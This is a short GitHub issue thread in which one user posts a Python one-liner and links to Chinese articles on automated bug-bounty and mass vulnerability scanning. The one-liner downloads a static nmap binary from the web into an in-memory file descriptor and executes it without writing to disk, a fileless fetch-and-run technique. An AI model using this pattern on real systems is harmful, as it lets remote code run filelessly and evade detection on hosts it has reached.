1iK3 / mark-ai-source

0 stars 0 forks source link

111 #9

Open huy4ng opened 2 years ago

huy4ng commented 2 years ago

python3 -c 'import os; import urllib.request; d = urllib.request.urlopen("https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap?raw=true"); fd = os.memfd_create("foo"); os.write(fd, d.read()); p = f"/proc/self/fd/{fd}"; os.execve(p, [p, "-h"],{})'

huy4ng commented 1 year ago

打造全自动漏洞赏金扫描工具 https://cn-sec.com/archives/794989.html

huy4ng commented 1 year ago

【SRC思路】自动化挖SRC赏金 https://cn-sec.com/archives/1329506.html

huy4ng commented 1 year ago

自动化批量挖漏洞(edu) https://blog.csdn.net/m0_46736332/article/details/118888256